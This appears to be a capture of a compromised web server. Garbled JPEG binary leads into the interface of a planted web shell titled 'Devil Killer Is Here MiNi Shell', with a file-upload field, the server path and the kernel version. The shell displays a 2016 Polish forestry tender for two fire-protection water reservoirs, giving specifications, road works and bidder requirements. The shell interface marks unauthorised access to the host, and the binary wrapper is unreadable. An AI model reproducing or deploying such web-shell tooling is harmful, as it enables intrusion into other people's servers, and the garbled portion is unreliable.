JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20160719/

Linux 9dbcd5f6333d 5.15.0-102-generic #112-Ubuntu SMP Tue Mar 5 16:50:32 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20160719/143499-N-2016.html

<p class="kh_header"><b>Babimost: Budowa wielofunkcyjnych zbiorników wody w leśnictwach Chwalim i Wąchabno Nadleśnictwa Babimost</b><br>
<b>Numer ogłoszenia: 143499 - 2016; data zamieszczenia: 19.07.2016</b><br>
OGŁOSZENIE O ZAMÓWIENIU - roboty budowlane<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b>
<!--zamówienia publicznego.</p>-->
<table class="text2">
<tr><td style="border: solid 1px; width:15px black; text-align: center;"><b>V</b></td>
<td>zamówienia publicznego</td></tr>
<tr><td style="border: solid 1px; width:15px black; text-align: center;"></td>
<td>zawarcia umowy ramowej</td></tr>
<tr><td style="border: solid 1px; width:15px black; text-align: center;"></td>
<td>ustanowienia dynamicznego systemu zakupów (DSZ)</td></tr>
</table>


<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Nadleśnictwo Babimost , ul. Leśna 17, 66-110 Babimost, woj. lubuskie, tel. 068 3512255, faks 068 3512475.</p>
<ul class="kh_indent_1">
</ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Inny: jednostka organizacyjna nie posiadająca osobowości prawnej PGL LP.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Budowa wielofunkcyjnych zbiorników wody w leśnictwach Chwalim i Wąchabno Nadleśnictwa Babimost.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> roboty budowlane.</p>
<p><b>II.1.4) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> 1.Przedmiotem zamówienia jest: 
1.1. Budowa wielofunkcyjnego zbiornika wody w Leśnictwie Chwalim Gmina KARGOWA 
- obręb Wojnowo; działka nr 191. 
1.2. Budowa wielofunkcyjnego zbiornika wody w Leśnictwie Wąchabno, Gmina BABIMOST - obręb Nowe Kramsko; działka nr 71/1.
Roboty będą wykonywane na gruntach stanowiących własność Skarbu Państwa w zarządzie Nadleśnictwa Babimost podlegają warunkom Pozwoleń na budowę nr 358/16 oraz 359/16z dnia 28.06.2016 r. wydanych przez Starostę Zielonogórskiego.

2. Przedmiotem zamówienia jest budowa wielofunkcyjnych zbiorników wody w miejscu istniejących zbiorników stalowych, w celu stworzenia minimalnej pojemności użytkowej w ilości 50m3. Zaprojektowano uszczelnione geomembraną PEHD zbiorniki o pojemności użytkowej 200m3. Będą one pełniły funkcje o znaczeniu przeciwpożarowym i przyrodniczym, ponadto jako element krajobrazowy oraz wodopój dla zwierzyny i ptactwa. 

3. Zbiorniki zaprojektowano przy dojazdach pożarowych, w miejscach 
istniejących zbiorników stalowych o pojemności użytkowej 25m3, w niewielkich zagłębieniach terenu z uwagi na możliwość naturalnego uzupełniania ubytków wody oraz z uwagi na brak konieczności budowy przelewu awaryjnego ani innych urządzeń do regulacji poziomu wody w zbiornikach. Przepełnienie i przelanie zbiorników nie skutkuje zniszczeniem ich konstrukcji. Istniejące zbiorniki stalowe stanowiące własność Zamawiającego należy zdemontować i zutylizować - wywieść w miejsce wskazane przez Zamawiającego na odległość do 25km.

4.Budowa zbiorników w celu uzyskania stałej retencji wody w zbiornikach powyżej 50m3 jest niezbędna, a przedmiotowe obiekty stanowią wymagany zapas wody w przeciwpożarowym zabezpieczeniu przyległych użytków leśnych. 

5. Bezpośrednio przy zbiornikach w nawiązaniu do dojazdu pożarowego projektuje się utwardzone place pełniące funkcję mijanek w ramach komunikacji przeciwpożarowej oraz miejsce organizacji punktu czerpalnego dla gaśniczych wozów strażackich podjeżdżających w celu poboru wody ze zbiorników.

6. Projektowane budowy zbiorników oraz budowa mijanek dróg dojazdowych nie zmienia sposobu użytkowania działek. Projektowana zmiana zagospodarowania ma na celu dostosowanie terenu do wytycznych p.poż. oraz poprawę warunków przyrodniczych przez utworzenie retencji w ilości 282,5m3,w tym ponad 50,0 m3 na cele użytkowe i ochrony p.poż. W ramach inwestycji projektuje się przyległe do drogi mijanki dla wozów gaśniczych, z poszerzeniem na organizację stanowisk do czerpania wody; całość otoczona będzie pasem zieleni. Zaprojektowane zbiorniki zostaną uszczelnione membraną hydroizolacyjną przy łagodnym pochyleniu skarp w stosunku 1:2 i 1:5 w miejscach organizacji punktów czerpania wody i zejść dla zwierząt.  

7. Budowane zbiorniki wodne położone są w bezpośrednim sąsiedztwie terenów leśnych. Pobór wody do napełniania zbiorników i podtrzymania zalewu odbywać się będzie z terenu przyległego.
8. Szczegółowy opis przedmiotu zamówienia dotyczący obu zbiorników:
8.1. PARAMETRY ZBIORNIKA
Zbiornik posiada kształt prostokąta, podane niżej wielkości są maksymalnymi wymiarami. 
- wymiary zbiornika: długość 25,0m, szerokość 14,0m, powierzchnia 350 m2 
- wymiary lustra wody: długość 23,8m, szerokość 12,8m, powierzchnia 305 m2 
- wymiary dna zbiornika: długość 12,0m, szerokość 6,0m, powierzchnia 72,0 m2 
- projektowana rzędna czaszy 62,30 m n.p.m.
- projektowana rzędna dna 60,50 m n.p.m.
- Głębokość całkowita zbiornika 1,8 m
- Głębokość maksymalna lustra wody 1,5 m przy 62,00m n.p.m.
- Pojemność wodna ( Vc )  	- 282,5 m3 
- Pojemność wodna minimalna ( Vmin )-   82,5 m3 przy  H = 0,6m
- Pojemność wodna użyteczna ( Vu)  	- 200,0 m3 przy H = 0,9m
8.2.	Zakres robót budowlanych.
W ramach inwestycji zostaną wykonane następujące roboty:
a. roboty przygotowawcze:
- roboty pomiarowe;
- usunięcie karpin i  krzewów;
- zdjęcie i hałdowanie warstwy humusowej z terenu przewidzianego pod roboty ziemne;
- wykonanie czasowych dróg technologicznych z płyt żelbetowych lub tłuczniowych;
b. roboty ziemne - zasadnicze:
- wykop spycharką do poziomu zalegania wody gruntowej, ewentualnie tylko wykop koparką, po grawitacyjnym odwodnieniu wykopu z przemieszczeniem urobku do zagłębień terenowych oraz na odkład, do usypania grobli;
- odwodnienie wykopu wykonać poprzez tymczasowy rurociąg;
- przemieszczanie urobku spycharką na sąsiedni teren;
-wykop koparką (czerpanie poniżej poziomu wody gruntowej) z przemieszczeniem spycharką;
- wykop koparką z transportem urobku samochodami samowyładowczymi na odl. do 1,0 km;
- rozplantowanie gruntu spycharką na terenie przewidzianym do podwyższenia i adaptacji, z wyrównaniem powierzchni;
- usypanie i uformowanie grobli nasypu drogowego z humusowaniem;
c. roboty wykończeniowe:
- uszczelnienie zbiornika;
- wykonanie obsypek i narzutów;
- rozścielenie humusu na wyrównanym terenie;
- obsianie mieszankami traw korony zbiornika, skarp powyżej NPP po uprzednim wykonaniu humusowania tych powierzchni;
- zagospodarowanie metodą pełnej uprawy terenu wokół zbiornika w miejscach gdzie zostało wykonane rozplantowanie urobku z wykopu; 
d. roboty drogowe;
- drobne roboty ziemne z profilowaniem przekroju drogowego i rowów przydrożnych,
- zagęszczenie podbudowy oraz ułożenie i zagęszczenie warstwy dolnej i zamykającej.


8.3.	Roboty przygotowawcze, ziemne, uszczelniające i umocnieniowe
Zbiornik
Projektowany zbiornik wody jest otwartym zbiornikiem ziemnym powstałym przez wykopanie niecki terenowej o głębokości 1,8 m. Obsługa zbiornika z drogi i placów o nawierzchni utwardzonej tłuczniem kamiennym. Zbiornik będzie służyć głównie do retencji wody na cele przeciwpożarowe oraz na cele przyrodnicze. Z uwagi na ukształtowanie terenu nie projektuje się regulacji poziomu wody, zabezpieczenie przed przelaniem zbiornika - naturalne przesiąki do gruntu na poziomie -0,3m od poziomu korony zbiornika.
Podstawowym zasilaniem zbiornika będzie teren przyległy oraz rów, przez który przepływa okresowo woda z opadów i roztopów. Zasilanie zbiornika będzie przez wody roztopowe i deszczowe bezpośrednio przez koronę z terenu przyległego lub przez rurociąg zasilający z piętrzenia wody na rowie melioracji szczegółowej. W okresach długotrwałej suszy - przez dowóz beczkowozami.
Pochylenie skarp łagodne w stosunku 1:2 i 1:5 w miejscu organizacji punktu czerpania wody. Niweleta terenu przy zbiorniku według rysunków.
Zbiornik zlokalizowany jest w terenie leśnym zadrzewionym. Istniejący drzewostan zostanie usunięty przez Zamawiającego. Pozostaną jedynie pnie, które w ramach budowy zbiornika będą wykarczowane i wywiezione na wskazane miejsce na odległości do 2km. 

Uszczelnienie dna i skarp zbiornika zostanie wykonane geomembraną PEHD grubości 2,0 mm, ułożoną na zagęszczonym podłożu rodzimym i 10 cm warstwie piasku. Folia ma być układana w gotowym wykopie i połączona na zakładkę przez zgrzewanie polifuzyjne. Membrana zostanie wywinięta i zakotwiona na koronie zbiornika, pod warstwą uszczelniającą z PEHD ułożyć geowłókninę ochronną również zakotwioną w rowie kotwiącym. Geomembrana PEHD powinna posiadać następujące parametry (wartości minimalne): grubość 2,0 mm masa powierzchniowa 3200g/m2 odporność na przebicie nie mniej niż 3 kN maksymalne naprężenia przy rozciąganiu wzdłuż >= 15 MPa, w poprzek >= 15 MPa wydłużenie względne przy zerwaniu wzdłuż > 200% wytrzymałość na rozdzieranie wzdłuż >= 80N/m, w poprzek >= 60 N/m giętkość przy przeginaniu na wałku o średnicy 5 mm w temp. - 20°C brak pękania i pojawiania się rys, przesiąkliwość wody przy ciśnieniu 0,5 MPa w czasie 72 h - brak przesiąkania. 

Umocnienia skarp zbiornika; w celu uniknięcia abrazji brzegów zbiornika wywołanymi uderzeniami fal o brzeg zaprojektowano narzut kamienny o średnicy ponad 10cm na podsypce gruntowej grubości min 10cm. Ustalenie przelewu przez narzut do gruntu gwarantuje utrzymanie projektowanego poziomu wody. W celu zabezpieczenia geomembrany pod narzutem kamiennym zastosowano geowłókninę przeznaczoną do stosowania w budowlach ziemnych, pełniącą funkcje: ochronne, separacyjne, filtrujące, wzmacniające i drenujące. Geowłóknina, podstawowe dane techniczne: masa powierzchniowa: >200 g/m2, grubość: +10%, mm przy nacisku: 2 kPa 2,9 /20 kPa 2,1 /200 kPa 1,1, wytrzymałość na rozciąganie: >7 kN/m, odporność na statyczne przebicie (metoda CBR), siła przebicia: >1,5 kN, odporność na dynamiczne przebicie: średnica otworu<10 mm, współczynnik wodoprzepuszczalności kv: < 110E-3m/s.

Zasilanie z terenu przyległego i rowu uszczelnionego geomembraną z folii (PEHD) lub polipropylenu (PP), na geowłókninie i podsypce piaskowej.

Schody typowe betonowe stopnie skarpowe.

Nawierzchnie dojazdów z tłucznia kamiennego na nasypie z piasku o stopniu zagęszczenia ISmin = 0,99. Warstwa podbudowy zasadniczej z tłucznia (niesort) o uziarnieniu 0-63mm, warstwa wzmacniająca z tłucznia (niesort) 0-31,5mm zamknięta wysiewkami bazaltowymi (jezdnia) i granitowymi (pobocza i mijanki) 0-5mm.

Ogrodzenie zbiornika
Wybudowany zbiornik nie będzie ogrodzony. 

Napełnienie i próba szczelności zbiornika
Zgodnie z par. 13 ust. 1 Rozporządzenia Ministra Środowiska z dnia 20 kwietnia 2007 r. w sprawie warunków technicznych, jakim powinny odpowiadać budowle hydrotechniczne i ich usytuowanie (Dz. U. Nr 86, poz. 579) warunkiem przekazania do użytkowania zbiornika wodnego wraz z budowlami hydrotechnicznymi jest uzyskanie pozytywnych wyników próbnego obciążenia wodą. Próbnemu obciążeniu wodą podlegać będzie czasza zbiornika przy spiętrzonej wodzie w zbiorniku do N.P.P. - 62,00m n.p.m.
Zbiornik może być dopuszczony do próbnego obciążenia wodą po stwierdzeniu, że:
1.  zapewniony jest dojazd/dojście ;
2.  przygotowano do zalania i odebrano technicznie czaszę zbiornika;
3.  skompletowano pełną dokumentację techniczną i powykonawczą wraz z instrukcją użytkowania.
Próbne obciążenie wodą należy prowadzić do czasu osiągnięcia N.P.P i przez następne 3 dni - komisyjnie, z udziałem Kierownika budowy, Inspektora nadzoru inwestorskiego oraz w razie potrzeby, z udziałem Nadzoru autorskiego.
Z próbnego obciążenia wodą należy sporządzić protokół zawierający ocenę obciążanej wodą budowli oraz wniosek o dopuszczenie budowli do użytkowania. Niezależnie od sporządzonego protokołu, należy dokonać odpowiedniego wpisu do dziennika budowy o przeprowadzonym próbnym obciążeniu wodą wraz z wnioskiem o dopuszczeniu budowli do użytkowania.

Dojazdy.
Rodzaj nawierzchni - twarda nieulepszona. Założona konstrukcja nawierzchni: warstwa górnej, klinującej z wysiewek bazaltowych (jezdnia) i granitowych (pobocza i mijanka) o frakcji 0÷5mm - 2cm; warstwy wzmacniającej z tłucznia (niesort) o frakcji 0÷31,5mm - 9 cm, warstwa podbudowy zasadniczej z kruszywa łamanego o frakcji 0÷63 mm - 18 cm. Na drogach dojazdowych przewidziano możliwość odbudowy nawierzchni o podobnej konstrukcji.
Urządzenia bezpieczeństwa ruchu - na czas prowadzenia robót drogowych należy opracować organizację ruchu i uzgodnić z Nadleśnictwem ograniczając się do oznakowania pionowego. Docelowo przewiduje się ustawić słupki krawędziowe. Słupki należy ustawić w odległości 0,50 m od krawędzi jezdni. Jako dodatkowe elementy bezpieczeństwa ruchu na drodze leśnej przewiduje się mijanki i zjazdy. Dla zapewnienia właściwego odwodnienia drogi zaprojektowano spadek poprzeczny jednostronny wynoszący 3% dla jezdni, 5% dla poboczy i mijanki. Pozwoli to na szybki spływ wód powierzchniowych z nawierzchni i korpusu drogi do naturalnych wgłębień terenu i rowów. Korpus drogowy jest wyniesiony średnio ok. 0,15 cm ponad istniejący teren. Schemat odwodnienia pokazano na przekrojach porzecznych i PZT.

Roboty drogowe
Budowa elementów dojazdu ma na celu dostosowanie go do standardów leśnych i wymogów prawnych związanych z zabezpieczeniem przeciwpożarowym lasów. W ramach projektu zaprojektowano plac manewrowy oraz mijankę o nawierzchni twardej nieulepszonej z kruszyw stabilizowanych mechanicznie. Podstawowe dane techniczne - założenia projektu:
1.	Długość bezpośrednio przy planowanej inwestycji mijanka 22,0m do punktu czerpania wody,
2.	Szerokość pasa drogowego z poboczem - 5,0 m
3.	Szerokość jezdni - 3,5 m, szerokość z mijanką - 6,0, z placem manewrowym punktu p.poż. - 23,5m
4.	Szerokość poboczy - 0,75 m
5.	Pochylenie poprzeczne jezdni - 4,0 %
6.	Maksymalne pochylenie niwelety - 0,52 % (max 8%)
7.	Rodzaj nawierzchni - twarda nieulepszona 
8.	Konstrukcja nawierzchni:
-	warstwa klinującej z wysiewek bazaltowych (jezdnia) i granitowych (pobocza i mijanka) o frakcji 0÷5mm - 2cm
-	wzmacniającej z tłucznia (niesort) o frakcji 0÷31,5mm - 9 cm, 
-	warstwa podbudowy zasadniczej z kruszywa łamanego o frakcji 0÷63 mm - 18 cm.
9.	Prędkość projektowa - max 30 km/h
10. Kategoria gruntu podłoża - G1
11. Warunki wodne - przeciętne
12. Obciążenie ruchem - ruch lekki
13. Nośność nawierzchni - 16 ton, 
Mijankę z miejscem na organizowanie punktu poboru wody lokalizuje się od strony północno-wschodniej projektowanego zbiornika. Mijanka będzie służyć do komunikacji przeciwpożarowej strażackich wozów bojowych, podjeżdżających w celu poboru wody ze zbiornika, w trakcie ewentualnej akcji gaśniczej.

Uzbrojenie zbiornika
Dla potrzeb projektowanego zbiornika wodnego zaprojektowano budowę następujących budowli:
1. Wodowskaz L= 2,0m
2. Utwardzone zejście - miejsce organizacji stanowiska poboru wody na potrzeby p-poż.
3. Schody zejściowe - miejsce organizacji stanowiska poboru wody na potrzeby p-poż.
4. Place manewrowe utwardzone tłuczniem.
5. Zejście dla zwierząt.
6. Zasilanie z terenu przyległego oraz umocnione narzutem kamiennym, na koronie zbiornika zaprojektowano przeciwspadek filtracyjny z kamienia narzutowego, w celu zatrzymania piasku niesionego przez wody w trakcie intensywnych opadów.

Roboty wykończeniowe
W związku z przemieszczeniem mas ziemnych ze zbiornika na teren przyległy oraz w celu wyrównania nierówności terenowych, projektuje się rekultywację i utworzenie terenów zielonych. Założono zdjęcie warstwy humusowej przed przemieszczeniem gruntu z wykopu zbiornika, następnie po ukształtowaniu terenu: rozplantowanie, humusowanie powierzchni, wykonanie uprawek agrotechnicznych oraz obsianie mieszankami traw. Rekultywacji podlegać będzie łącznie ok. 550m2 terenu leśnego.

8.4. Warunki techniczne i organizacyjne wykonania robót  
Warunki techniczne wykonywania robót dla poszczególnych zakresów (rodzajów) robót określone zostały w Specyfikacji technicznej wykonywania i odbioru robót  stanowiącej oddzielne opracowanie dokumentacji projektowej.
W opracowaniu tym podano także wymagania dotyczące przewidzianych do użycia materiałów. Ilości robót poszczególnych rodzajów podane są w części przedmiarowej dokumentacji.


8.5. Warunki organizacyjne wykonywania robót
Przy organizacji prac wykonawczych należy liczyć się ze specyfiką terenu robót wynikającą z lokalizacji robót na terenie kompleksu leśnego. W związku z tym warunki organizacyjne wykorzystania placu budowy należy uzgodnić ze służbą leśną szczególnie w zakresie:
- terminów wykonywania poszczególnych zakresów,
- dróg dojazdowych i miejsc składowania materiałów,
- konieczności usuwania drzew i runa leśnego,
- zasad pracy zapewniających zachowanie bezpieczeństwa pożarowego.

Szczegółowy opis przedmiotu zamówienia (rodzaj i ilość prac do wykonania) określa dokumentacja projektowa - osobna dla budowy każdego ze zbiorników (zgodna z rozporządzeniem Ministra Infrastruktury z dnia 2 września 2004 r. w sprawie szczegółowego zakresu i formy dokumentacji projektowej, specyfikacji technicznej wykonania i odbioru robót budowlanych oraz programu funkcjonalno-użytkowego (tekst jedn.: Dz. U. z 2015 r., poz. 2164), która zawiera:
- projekt budowlany (2 egz.),
- projekt wykonawczy (2 egz.),
- opinię geologiczną (2 egz.),
- specyfikacje techniczne wykonania i odbioru robót budowlanych (2 egz.),
- przedmiary robót (2 egz.)..</p>
<p><b>II.1.5)
<table class="text2">
<tr><td style="border: solid 1px black; width:15px; text-align: center;"><b>&nbsp;</b></td>
<td><b>przewiduje się udzielenie zamówień uzupełniających</b></td></tr>
</table>                            
</b></p>
<ul class="kh_indent_1"><li><b>Określenie przedmiotu oraz wielkości lub zakresu zamówień uzupełniających</b></li>
<li></li></ul>

<p><b>II.1.6) Wspólny Słownik Zamówień (CPV):</b> 45.00.00.00-7, 45.11.12.00-0, 45.24.00.00-1, 45.24.72.70-3, 45.23.32.20-7.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.8) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 15.11.2016.</p>
<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> 1. Zamawiający żąda wniesienia wadium  w wysokości: 8 000,00 zł (słownie: osiem tysięcy zł)
2. Wadium wnosi się przed upływem terminu składania ofert.
3. Każda oferta musi być zabezpieczona wadium przez cały okres związania ofertą. 
4. Wadium może być wniesione w jednej lub kilku następujących formach:
a) pieniądzu,
b) poręczeniach bankowych lub poręczeniach spółdzielczej kasy oszczędnościowo-kredytowej, z tym, że poręczenie kasy jest zawsze poręczeniem pieniężnym,
c) gwarancjach bankowych,
d) gwarancjach ubezpieczeniowych,
e) poręczeniach udzielanych przez podmioty, o których mowa w art. 6b ust. 5 pkt 2 ustawy z dnia 9 listopada 2000 r. o utworzeniu Polskiej Agencji Rozwoju Przedsiębiorczości (Dz. U. 2014 r., poz.1804, z późn. zm.).</p>
<p><b>III.2) ZALICZKI</b></p>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie formułuje szczegółowych wymagań dotyczących spełnienia wyżej wymienionego warunku. Zamawiający dokona oceny spełnienia tego warunku na podstawie złożonego przez Wykonawcę oświadczenia o spełnianiu warunków udziału w postępowaniu, o których mowa w art. 22 ust. 1 ustawy Prawo zamówień publicznych.</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Warunek zostanie spełniony, jeżeli Wykonawca wykaże, że wykonał w okresie ostatnich 
5 lat przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, co najmniej 2 zadania polegające na wykonaniu robót budowlanych z zakresu budowy, przebudowy, remontu urządzeń melioracji wodnych lub hydrotechnicznych  o wartości każdej roboty nie mniejszej niż 100 000,00 zł brutto. wraz z załączeniem dowodów  określających, czy roboty te zostały wykonane w sposób należyty oraz wskazujących, czy zostały wykonane zgodnie z zasadami sztuki budowlanej i prawidłowo ukończone z podaniem daty i miejsca wykonania. 
(W przypadku składania oferty wspólnej Wykonawcy składają jeden wspólny w/w wykaz). 
W przypadku, gdy Wykonawca dla potwierdzenia spełniania warunku posiadania doświadczenia przedstawi dokumenty zawierające kwoty wyrażone w walutach innych niż złoty polski, Zamawiający przeliczy je na złoty polski. Do przeliczenia zostanie zastosowany wyliczony i ogłoszony przez Narodowy Bank Polski bieżący kurs średni wymiany na dzień publikacji ogłoszenia o zamówieniu w Biuletynie Zamówień Publicznych. 
 Ocena spełnienia powyższych warunków udziału w niniejszym postępowaniu będzie polegać na sprawdzeniu kompletności i poprawności złożonych dokumentów i oświadczeń. Z treści załączonych dokumentów musi wynikać jednoznacznie iż, ww. warunki Wykonawca spełnił. Nie spełnienie chociażby jednego warunku, skutkować będzie wykluczeniem Wykonawcy z postępowania. Ocena zostanie dokonana w oparciu o zasadę: spełnia - nie spełnia.</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie formułuje szczegółowych wymagań dotyczących spełnienia wyżej wymienionego warunku. Zamawiający dokona oceny spełnienia tego warunku na podstawie złożonego przez Wykonawcę oświadczenia o spełnianiu warunków udziału w postępowaniu, o których mowa w art. 22 ust. 1 ustawy Prawo zamówień publicznych.</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający wymaga, aby Wykonawca wykazał i udokumentował, że osoba lub osoby, które będą z ramienia Wykonawcy kierowały robotami budowlanymi posiadały aktualne uprawnienia budowlane do kierowania robotami w specjalnościach:
- konstrukcyjno - budowlanej;
- konstrukcyjno-budowlanej o specjalizacji obiekty budowlane melioracji   wodnych umożliwiające kierowanie robotami  budowlanymi, który muszą posiadać uprawnienia budowlane do wykonywania samodzielnych funkcji technicznych w budownictwie;
Osoby, uczestniczące w wykonywaniu zamówienia - kierownicy we wskazanych wyżej specjalnościach muszą posiadać aktualne dokumenty stwierdzające ich przynależność do odpowiedniej izby samorządu zawodowego wraz z aktualnym zaświadczeniem o obowiązkowym ubezpieczeniu od odpowiedzialności cywilnej z tytułu wykonywanego zawodu.
Dopuszcza się  możliwość pełnienia więcej niż jednej funkcji przez jedną osobę, pod warunkiem łącznego spełnienia przez wskazaną osobę wyżej określonych wymagań.
Zamawiający wymaga, aby Wykonawca wskazał osobę, która będzie pełniła funkcje Głównego Kierownika Robót spośród osób wskazanych do kierowania robotami w poszczególnych specjalnościach.
